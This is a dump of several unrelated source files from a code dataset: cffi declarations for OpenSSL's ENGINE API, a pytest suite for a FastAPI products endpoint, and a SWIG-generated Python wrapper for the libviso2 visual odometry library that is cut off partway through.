void ENGINE_unregister_digests(ENGINE *);
void ENGINE_register_all_digests(void);
int ENGINE_register_complete(ENGINE *);
int ENGINE_register_all_complete(void);
int ENGINE_ctrl(ENGINE *, int, long, void *, void (*)(void));
int ENGINE_cmd_is_executable(ENGINE *, int);
int ENGINE_ctrl_cmd(ENGINE *, const char *, long, void *, void (*)(void), int);
int ENGINE_ctrl_cmd_string(ENGINE *, const char *, const char *, int);
ENGINE *ENGINE_new(void);
int ENGINE_free(ENGINE *);
int ENGINE_up_ref(ENGINE *);
int ENGINE_set_id(ENGINE *, const char *);
int ENGINE_set_name(ENGINE *, const char *);
int ENGINE_set_RSA(ENGINE *, const RSA_METHOD *);
int ENGINE_set_DSA(ENGINE *, const DSA_METHOD *);
int ENGINE_set_ECDH(ENGINE *, const ECDH_METHOD *);
int ENGINE_set_ECDSA(ENGINE *, const ECDSA_METHOD *);
int ENGINE_set_DH(ENGINE *, const DH_METHOD *);
int ENGINE_set_RAND(ENGINE *, const RAND_METHOD *);
int ENGINE_set_STORE(ENGINE *, const STORE_METHOD *);
int ENGINE_set_destroy_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_init_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_finish_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_ctrl_function(ENGINE *, ENGINE_CTRL_FUNC_PTR);
int ENGINE_set_load_privkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_load_pubkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_ciphers(ENGINE *, ENGINE_CIPHERS_PTR);
int ENGINE_set_digests(ENGINE *, ENGINE_DIGESTS_PTR);
int ENGINE_set_flags(ENGINE *, int);
int ENGINE_set_cmd_defns(ENGINE *, const ENGINE_CMD_DEFN *);
const char *ENGINE_get_id(const ENGINE *);
const char *ENGINE_get_name(const ENGINE *);
const RSA_METHOD *ENGINE_get_RSA(const ENGINE *);
const DSA_METHOD *ENGINE_get_DSA(const ENGINE *);
const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *);
const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *);
const DH_METHOD *ENGINE_get_DH(const ENGINE *);
const RAND_METHOD *ENGINE_get_RAND(const ENGINE *);
const STORE_METHOD *ENGINE_get_STORE(const ENGINE *);
const EVP_CIPHER *ENGINE_get_cipher(ENGINE *, int);
const EVP_MD *ENGINE_get_digest(ENGINE *, int);
int ENGINE_get_flags(const ENGINE *);
const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *);
EVP_PKEY *ENGINE_load_private_key(ENGINE *, const char *, UI_METHOD *, void *);
EVP_PKEY *ENGINE_load_public_key(ENGINE *, const char *, UI_METHOD *, void *);
void ENGINE_add_conf_module(void);
"""
MACROS = """
void ENGINE_load_cryptodev(void);
"""
CUSTOMIZATIONS = """
#if defined(LIBRESSL_VERSION_NUMBER)
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 0;
void (*ENGINE_load_cryptodev)(void) = NULL;
#else
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 1;
#endif
"""
| <filename>src/_cffi_src/openssl/engine.py<gh_stars>0
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/engine.h>
"""
TYPES = """
static const long Cryptography_HAS_ENGINE_CRYPTODEV;
typedef ... ENGINE;
typedef ... RSA_METHOD;
typedef ... DSA_METHOD;
typedef ... ECDH_METHOD;
typedef ... ECDSA_METHOD;
typedef ... DH_METHOD;
typedef struct {
void (*seed)(const void *, int);
int (*bytes)(unsigned char *, int);
void (*cleanup)();
void (*add)(const void *, int, double);
int (*pseudorand)(unsigned char *, int);
int (*status)();
} RAND_METHOD;
typedef ... STORE_METHOD;
typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *);
typedef ... *ENGINE_CTRL_FUNC_PTR;
typedef ... *ENGINE_LOAD_KEY_PTR;
typedef ... *ENGINE_CIPHERS_PTR;
typedef ... *ENGINE_DIGESTS_PTR;
typedef ... ENGINE_CMD_DEFN;
typedef ... UI_METHOD;
static const unsigned int ENGINE_METHOD_RSA;
static const unsigned int ENGINE_METHOD_DSA;
static const unsigned int ENGINE_METHOD_RAND;
static const unsigned int ENGINE_METHOD_ECDH;
static const unsigned int ENGINE_METHOD_ECDSA;
static const unsigned int ENGINE_METHOD_CIPHERS;
static const unsigned int ENGINE_METHOD_DIGESTS;
static const unsigned int ENGINE_METHOD_STORE;
static const unsigned int ENGINE_METHOD_ALL;
static const unsigned int ENGINE_METHOD_NONE;
static const int ENGINE_R_CONFLICTING_ENGINE_ID;
"""
FUNCTIONS = """
ENGINE *ENGINE_get_first(void);
ENGINE *ENGINE_get_last(void);
ENGINE *ENGINE_get_next(ENGINE *);
ENGINE *ENGINE_get_prev(ENGINE *);
int ENGINE_add(ENGINE *);
int ENGINE_remove(ENGINE *);
ENGINE *ENGINE_by_id(const char *);
int ENGINE_init(ENGINE *);
int ENGINE_finish(ENGINE *);
void ENGINE_load_openssl(void);
void ENGINE_load_dynamic(void);
void ENGINE_load_builtin_engines(void);
void ENGINE_cleanup(void);
ENGINE *ENGINE_get_default_RSA(void);
ENGINE *ENGINE_get_default_DSA(void);
ENGINE *ENGINE_get_default_ECDH(void);
ENGINE *ENGINE_get_default_ECDSA(void);
ENGINE *ENGINE_get_default_DH(void);
ENGINE *ENGINE_get_default_RAND(void);
ENGINE *ENGINE_get_cipher_engine(int);
ENGINE *ENGINE_get_digest_engine(int);
int ENGINE_set_default_RSA(ENGINE *);
int ENGINE_set_default_DSA(ENGINE *);
int ENGINE_set_default_ECDH(ENGINE *);
int ENGINE_set_default_ECDSA(ENGINE *);
int ENGINE_set_default_DH(ENGINE *);
int ENGINE_set_default_RAND(ENGINE *);
int ENGINE_set_default_ciphers(ENGINE *);
int ENGINE_set_default_digests(ENGINE *);
int ENGINE_set_default_string(ENGINE *, const char *);
int ENGINE_set_default(ENGINE *, unsigned int);
unsigned int ENGINE_get_table_flags(void);
void ENGINE_set_table_flags(unsigned int);
int ENGINE_register_RSA(ENGINE *);
void ENGINE_unregister_RSA(ENGINE *);
void ENGINE_register_all_RSA(void);
int ENGINE_register_DSA(ENGINE *);
void ENGINE_unregister_DSA(ENGINE *);
void ENGINE_register_all_DSA(void);
int ENGINE_register_ECDH(ENGINE *);
void ENGINE_unregister_ECDH(ENGINE *);
void ENGINE_register_all_ECDH(void);
int ENGINE_register_ECDSA(ENGINE *);
void ENGINE_unregister_ECDSA(ENGINE *);
void ENGINE_register_all_ECDSA(void);
int ENGINE_register_DH(ENGINE *);
void ENGINE_unregister_DH(ENGINE *);
void ENGINE_register_all_DH(void);
int ENGINE_register_RAND(ENGINE *);
void ENGINE_unregister_RAND(ENGINE *);
void ENGINE_register_all_RAND(void);
int ENGINE_register_STORE(ENGINE *);
void ENGINE_unregister_STORE(ENGINE *);
void ENGINE_register_all_STORE(void);
int ENGINE_register_ciphers(ENGINE *);
void ENGINE_unregister_ciphers(ENGINE *);
void ENGINE_register_all_ciphers(void);
int ENGINE_register_digests(ENGINE *);
void ENGINE_unregister_digests(ENGINE *);
void ENGINE_register_all_digests(void);
int ENGINE_register_complete(ENGINE *);
int ENGINE_register_all_complete(void);
int ENGINE_ctrl(ENGINE *, int, long, void *, void (*)(void));
int ENGINE_cmd_is_executable(ENGINE *, int);
int ENGINE_ctrl_cmd(ENGINE *, const char *, long, void *, void (*)(void), int);
int ENGINE_ctrl_cmd_string(ENGINE *, const char *, const char *, int);
ENGINE *ENGINE_new(void);
int ENGINE_free(ENGINE *);
int ENGINE_up_ref(ENGINE *);
int ENGINE_set_id(ENGINE *, const char *);
int ENGINE_set_name(ENGINE *, const char *);
int ENGINE_set_RSA(ENGINE *, const RSA_METHOD *);
int ENGINE_set_DSA(ENGINE *, const DSA_METHOD *);
int ENGINE_set_ECDH(ENGINE *, const ECDH_METHOD *);
int ENGINE_set_ECDSA(ENGINE *, const ECDSA_METHOD *);
int ENGINE_set_DH(ENGINE *, const DH_METHOD *);
int ENGINE_set_RAND(ENGINE *, const RAND_METHOD *);
int ENGINE_set_STORE(ENGINE *, const STORE_METHOD *);
int ENGINE_set_destroy_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_init_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_finish_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_ctrl_function(ENGINE *, ENGINE_CTRL_FUNC_PTR);
int ENGINE_set_load_privkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_load_pubkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_ciphers(ENGINE *, ENGINE_CIPHERS_PTR);
int ENGINE_set_digests(ENGINE *, ENGINE_DIGESTS_PTR);
int ENGINE_set_flags(ENGINE *, int);
int ENGINE_set_cmd_defns(ENGINE *, const ENGINE_CMD_DEFN *);
const char *ENGINE_get_id(const ENGINE *);
const char *ENGINE_get_name(const ENGINE *);
const RSA_METHOD *ENGINE_get_RSA(const ENGINE *);
const DSA_METHOD *ENGINE_get_DSA(const ENGINE *);
const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *);
const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *);
const DH_METHOD *ENGINE_get_DH(const ENGINE *);
const RAND_METHOD *ENGINE_get_RAND(const ENGINE *);
const STORE_METHOD *ENGINE_get_STORE(const ENGINE *);
const EVP_CIPHER *ENGINE_get_cipher(ENGINE *, int);
const EVP_MD *ENGINE_get_digest(ENGINE *, int);
int ENGINE_get_flags(const ENGINE *);
const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *);
EVP_PKEY *ENGINE_load_private_key(ENGINE *, const char *, UI_METHOD *, void *);
EVP_PKEY *ENGINE_load_public_key(ENGINE *, const char *, UI_METHOD *, void *);
void ENGINE_add_conf_module(void);
"""
MACROS = """
void ENGINE_load_cryptodev(void);
"""
CUSTOMIZATIONS = """
#if defined(LIBRESSL_VERSION_NUMBER)
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 0;
void (*ENGINE_load_cryptodev)(void) = NULL;
#else
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 1;
#endif
"""
| en | 0.281096 | 1.6716 | 2
tests/products/test_products.py | AlexandruScrob/fast_api_proj_2 | 0 | 9179 |
import pytest
from httpx import AsyncClient
from conf_test_db import app
from tests.shared.info import category_info, product_info
@pytest.mark.asyncio
async def test_new_product():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
payload = {
"name": "<NAME>",
"quantity": 4,
"description": "Quaker: Good Quality Oats",
"price": 10,
"category_id": category_obj.id,
}
response = await ac.post("/products/", json=payload)
assert response.status_code == 201
json_response = response.json()
assert json_response["name"] == "<NAME>"
assert json_response["quantity"] == 4
assert json_response["description"] == "Quaker: Good Quality Oats"
assert json_response["price"] == 10
@pytest.mark.asyncio
async def test_list_products():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
await product_info(category_obj)
response = await ac.get("/products/")
assert response.status_code == 200
assert "name" in response.json()[0]
assert "quantity" in response.json()[0]
assert "description" in response.json()[0]
assert "price" in response.json()[0]
| none | 1 | 2.418374 | 2
3rdparty/pyviso2/src/viso2.py | utiasSTARS/matchable-image-transforms | 11 | 9180 | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_viso2')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_viso2')
_viso2 = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_viso2', [dirname(__file__)])
except ImportError:
import _viso2
return _viso2
try:
_mod = imp.load_module('_viso2', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_viso2 = swig_import_helper()
del swig_import_helper
else:
import _viso2
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""value(self) -> PyObject *"""
return _viso2.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(self, n=1) -> SwigPyIterator
incr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(self, n=1) -> SwigPyIterator
decr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_decr(self, n)
def distance(self, x):
"""distance(self, x) -> ptrdiff_t"""
return _viso2.SwigPyIterator_distance(self, x)
def equal(self, x):
"""equal(self, x) -> bool"""
return _viso2.SwigPyIterator_equal(self, x)
def copy(self):
"""copy(self) -> SwigPyIterator"""
return _viso2.SwigPyIterator_copy(self)
def next(self):
"""next(self) -> PyObject *"""
return _viso2.SwigPyIterator_next(self)
def __next__(self):
"""__next__(self) -> PyObject *"""
return _viso2.SwigPyIterator___next__(self)
def previous(self):
"""previous(self) -> PyObject *"""
return _viso2.SwigPyIterator_previous(self)
def advance(self, n):
"""advance(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""__eq__(self, x) -> bool"""
return _viso2.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""__ne__(self, x) -> bool"""
return _viso2.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""__iadd__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""__isub__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""__add__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(self, n) -> SwigPyIterator
__sub__(self, x) -> ptrdiff_t
"""
return _viso2.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _viso2.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
class VisualOdometry(_object):
"""Proxy of C++ VisualOdometry class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometry, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometry, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_VisualOdometry
__del__ = lambda self: None
def process(self, p_matched_):
"""process(self, p_matched_) -> bool"""
return _viso2.VisualOdometry_process(self, p_matched_)
def getMotion(self):
"""getMotion(self) -> Matrix"""
return _viso2.VisualOdometry_getMotion(self)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.VisualOdometry_getMatches(self)
def getNumberOfMatches(self):
"""getNumberOfMatches(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfMatches(self)
def getNumberOfInliers(self):
"""getNumberOfInliers(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfInliers(self)
def getInlierIndices(self):
"""getInlierIndices(self) -> std::vector< int32_t,std::allocator< int32_t > >"""
return _viso2.VisualOdometry_getInlierIndices(self)
def getGain(self, inliers_):
"""getGain(self, inliers_) -> float"""
return _viso2.VisualOdometry_getGain(self, inliers_)
VisualOdometry_swigregister = _viso2.VisualOdometry_swigregister
VisualOdometry_swigregister(VisualOdometry)
class calibration(_object):
"""Proxy of C++ VisualOdometry::calibration class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, calibration, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, calibration, name)
__repr__ = _swig_repr
__swig_setmethods__["f"] = _viso2.calibration_f_set
__swig_getmethods__["f"] = _viso2.calibration_f_get
if _newclass:
f = _swig_property(_viso2.calibration_f_get, _viso2.calibration_f_set)
__swig_setmethods__["cu"] = _viso2.calibration_cu_set
__swig_getmethods__["cu"] = _viso2.calibration_cu_get
if _newclass:
cu = _swig_property(_viso2.calibration_cu_get, _viso2.calibration_cu_set)
__swig_setmethods__["cv"] = _viso2.calibration_cv_set
__swig_getmethods__["cv"] = _viso2.calibration_cv_get
if _newclass:
cv = _swig_property(_viso2.calibration_cv_get, _viso2.calibration_cv_set)
def __init__(self):
"""__init__(self) -> calibration"""
this = _viso2.new_calibration()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_calibration
__del__ = lambda self: None
calibration_swigregister = _viso2.calibration_swigregister
calibration_swigregister(calibration)
class bucketing(_object):
"""Proxy of C++ VisualOdometry::bucketing class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, bucketing, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, bucketing, name)
__repr__ = _swig_repr
__swig_setmethods__["max_features"] = _viso2.bucketing_max_features_set
__swig_getmethods__["max_features"] = _viso2.bucketing_max_features_get
if _newclass:
max_features = _swig_property(_viso2.bucketing_max_features_get, _viso2.bucketing_max_features_set)
__swig_setmethods__["bucket_width"] = _viso2.bucketing_bucket_width_set
__swig_getmethods__["bucket_width"] = _viso2.bucketing_bucket_width_get
if _newclass:
bucket_width = _swig_property(_viso2.bucketing_bucket_width_get, _viso2.bucketing_bucket_width_set)
__swig_setmethods__["bucket_height"] = _viso2.bucketing_bucket_height_set
__swig_getmethods__["bucket_height"] = _viso2.bucketing_bucket_height_get
if _newclass:
bucket_height = _swig_property(_viso2.bucketing_bucket_height_get, _viso2.bucketing_bucket_height_set)
def __init__(self):
"""__init__(self) -> bucketing"""
this = _viso2.new_bucketing()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_bucketing
__del__ = lambda self: None
bucketing_swigregister = _viso2.bucketing_swigregister
bucketing_swigregister(bucketing)
class VO_parameters(_object):
"""Proxy of C++ VisualOdometry::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VO_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VO_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["match"] = _viso2.VO_parameters_match_set
__swig_getmethods__["match"] = _viso2.VO_parameters_match_get
if _newclass:
match = _swig_property(_viso2.VO_parameters_match_get, _viso2.VO_parameters_match_set)
__swig_setmethods__["bucket"] = _viso2.VO_parameters_bucket_set
__swig_getmethods__["bucket"] = _viso2.VO_parameters_bucket_get
if _newclass:
bucket = _swig_property(_viso2.VO_parameters_bucket_get, _viso2.VO_parameters_bucket_set)
__swig_setmethods__["calib"] = _viso2.VO_parameters_calib_set
__swig_getmethods__["calib"] = _viso2.VO_parameters_calib_get
if _newclass:
calib = _swig_property(_viso2.VO_parameters_calib_get, _viso2.VO_parameters_calib_set)
def __init__(self):
"""__init__(self) -> VO_parameters"""
this = _viso2.new_VO_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VO_parameters
__del__ = lambda self: None
VO_parameters_swigregister = _viso2.VO_parameters_swigregister
VO_parameters_swigregister(VO_parameters)
class VisualOdometryMono(VisualOdometry):
"""Proxy of C++ VisualOdometryMono class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryMono, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryMono, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryMono"""
this = _viso2.new_VisualOdometryMono(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryMono
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I, dims, replace=False) -> bool
process(self, I, dims) -> bool
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
"""
return _viso2.VisualOdometryMono_process(self, *args)
def getInlierMatches(self):
"""getInlierMatches(self) -> MatchVector"""
return _viso2.VisualOdometryMono_getInlierMatches(self)
def process_frame(self, *args):
"""
process_frame(self, image1, replace=False) -> bool
process_frame(self, image1) -> bool
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryMono_process_frame(self, *args)
VisualOdometryMono_swigregister = _viso2.VisualOdometryMono_swigregister
VisualOdometryMono_swigregister(VisualOdometryMono)
class Mono_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryMono::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Mono_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Mono_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["height"] = _viso2.Mono_parameters_height_set
__swig_getmethods__["height"] = _viso2.Mono_parameters_height_get
if _newclass:
height = _swig_property(_viso2.Mono_parameters_height_get, _viso2.Mono_parameters_height_set)
__swig_setmethods__["pitch"] = _viso2.Mono_parameters_pitch_set
__swig_getmethods__["pitch"] = _viso2.Mono_parameters_pitch_get
if _newclass:
pitch = _swig_property(_viso2.Mono_parameters_pitch_get, _viso2.Mono_parameters_pitch_set)
__swig_setmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Mono_parameters_ransac_iters_get, _viso2.Mono_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Mono_parameters_inlier_threshold_get, _viso2.Mono_parameters_inlier_threshold_set)
__swig_setmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_set
__swig_getmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_get
if _newclass:
motion_threshold = _swig_property(_viso2.Mono_parameters_motion_threshold_get, _viso2.Mono_parameters_motion_threshold_set)
def __init__(self):
"""__init__(self) -> Mono_parameters"""
this = _viso2.new_Mono_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Mono_parameters
__del__ = lambda self: None
Mono_parameters_swigregister = _viso2.Mono_parameters_swigregister
Mono_parameters_swigregister(Mono_parameters)
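# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the generated
# wrapper). It shows how the monocular odometry proxy above is typically
# driven. The calibration, camera height and pitch values are placeholder
# assumptions, and `frame` is assumed to be an 8-bit grayscale image in the
# array format accepted by process_frame().
def _example_mono_vo(frame):
    params = Mono_parameters()
    params.calib.f = 645.2      # focal length [px] (assumed)
    params.calib.cu = 635.9     # principal point u [px] (assumed)
    params.calib.cv = 194.1     # principal point v [px] (assumed)
    params.height = 1.6         # camera height above ground [m] (assumed)
    params.pitch = -0.08        # camera pitch [rad] (assumed)
    vo = VisualOdometryMono(params)
    if vo.process_frame(frame):
        return vo.getMotion()   # frame-to-frame motion as a Matrix proxy
    return None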
class VisualOdometryStereo(VisualOdometry):
"""Proxy of C++ VisualOdometryStereo class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryStereo, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryStereo, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryStereo"""
this = _viso2.new_VisualOdometryStereo(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryStereo
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
process(self, p_matched_) -> bool
"""
return _viso2.VisualOdometryStereo_process(self, *args)
def process_frame(self, image1, image2, replace=False):
"""
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryStereo_process_frame(self, image1, image2, replace)
VisualOdometryStereo_swigregister = _viso2.VisualOdometryStereo_swigregister
VisualOdometryStereo_swigregister(VisualOdometryStereo)
class Stereo_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryStereo::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Stereo_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Stereo_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["base"] = _viso2.Stereo_parameters_base_set
__swig_getmethods__["base"] = _viso2.Stereo_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Stereo_parameters_base_get, _viso2.Stereo_parameters_base_set)
__swig_setmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Stereo_parameters_ransac_iters_get, _viso2.Stereo_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Stereo_parameters_inlier_threshold_get, _viso2.Stereo_parameters_inlier_threshold_set)
__swig_setmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_set
__swig_getmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_get
if _newclass:
reweighting = _swig_property(_viso2.Stereo_parameters_reweighting_get, _viso2.Stereo_parameters_reweighting_set)
def __init__(self):
"""__init__(self) -> Stereo_parameters"""
this = _viso2.new_Stereo_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Stereo_parameters
__del__ = lambda self: None
Stereo_parameters_swigregister = _viso2.Stereo_parameters_swigregister
Stereo_parameters_swigregister(Stereo_parameters)
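# ---------------------------------------------------------------------------
# Hedged usage sketch (added for illustration; not part of the generated
# wrapper). It drives the stereo odometry proxy above on one rectified
# stereo pair. Calibration and baseline values are placeholder assumptions;
# `left` and `right` are assumed to be 8-bit grayscale images.
def _example_stereo_vo(left, right):
    params = Stereo_parameters()
    params.calib.f = 645.2      # focal length [px] (assumed)
    params.calib.cu = 635.9     # principal point u [px] (assumed)
    params.calib.cv = 194.1     # principal point v [px] (assumed)
    params.base = 0.571         # stereo baseline [m] (assumed)
    vo = VisualOdometryStereo(params)
    if vo.process_frame(left, right):
        # getMotion() returns the frame-to-frame transform as a Matrix proxy.
        return vo.getMotion(), vo.getNumberOfMatches(), vo.getNumberOfInliers()
    return None, 0, 0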
class Matrix(_object):
"""Proxy of C++ Matrix class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matrix, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matrix, name)
